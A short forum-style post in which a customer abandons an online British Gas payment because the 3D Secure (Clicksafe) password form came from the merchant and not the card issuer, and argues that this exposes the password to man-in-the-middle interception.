I just tried to pay my British Gas bill onliine, but had to abandon the payment because the Clicksafe form came from British Gas, not from the card issuer. I'm beginning to wonder if Visa/Clicksafe/3D secure are giving unsound advice to payment services.
The basic problem is that the challenge phrase is useless as a security measure, as it is easy for a man in the middle to obtain, even if they are not an authorised payment service. One can check to where the form submits, but it is not easy to check whether that will be subverted by scripting. Therefore the only way of ensuring that password only goes to the card issuer is to make sure that the form has SSL certificates for the card issuer.
At least as of about a month ago, SagePay also had this problem.
Fortunately, an increasing number of companies are accepting push payments. British Gas always have, although their online system didn't want to reveal the details.